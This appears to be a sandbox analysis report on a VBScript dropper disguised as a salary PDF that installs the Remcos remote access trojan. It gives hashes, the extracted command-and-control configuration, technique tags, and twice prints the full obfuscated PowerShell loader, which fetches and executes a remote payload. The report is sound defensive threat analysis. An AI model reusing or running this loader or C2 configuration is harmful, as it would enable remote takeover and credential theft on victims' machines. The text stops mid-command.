remcos | 30c17f93252f0c1927451e65f404db977fe6707a9775cf651c1b294e3dd76693

Analysis

max time kernel
147s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/10/2024, 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Salary Revision_pdf.vbs
Size

25KB
MD5

28dbf118827e6bf0607e4b736ae51611
SHA1

a0842630151f9633e4283d29dbd737cf1ca372e1
SHA256

aeae4edd76aaab5a1e861d14b5fbc5736fac6b569f74d004224786fcc129099c
SHA512

1aae265b966503d42f76e0bf3b2787922dc6ef38c953b8bf59466bce95bb21fafdc005fe921c677bf1ab15535114b8cb507fb624824980401a395c0dc14a2a1f
SSDEEP

384:Z3u2TO4+qjKwEW0mIuUco2aZHIA6hpsDWsC6yPm+/fAgYbGynO97jZ138:I2TrKZRmZUIZhpss6WHfr/ynO9Y

Score

10^/10

remcos remotehost collection discovery rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.214:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AOD6MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2628-86-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2220-95-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2100-96-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2100-96-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2628-86-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	2328	WScript.exe
7	2656	powershell.exe
9	2796	msiexec.exe
11	2796	msiexec.exe
12	2796	msiexec.exe
14	2796	msiexec.exe
15	2796	msiexec.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2796	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1588	powershell.exe
2796	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2796 set thread context of 2628	2796	msiexec.exe	38
PID 2796 set thread context of 2100	2796	msiexec.exe	39
PID 2796 set thread context of 2220	2796	msiexec.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2656	powershell.exe
1588	powershell.exe
1588	powershell.exe
2628	msiexec.exe
2628	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1588	powershell.exe
2796	msiexec.exe
2796	msiexec.exe
2796	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	2220	msiexec.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2656	2328	WScript.exe	31
PID 2328 wrote to memory of 2656	2328	WScript.exe	31
PID 2328 wrote to memory of 2656	2328	WScript.exe	31
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 1588 wrote to memory of 2796	1588	powershell.exe	36
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2628	2796	msiexec.exe	38
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2100	2796	msiexec.exe	39
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40
PID 2796 wrote to memory of 2220	2796	msiexec.exe	40

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary Revision_pdf.vbs"
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende 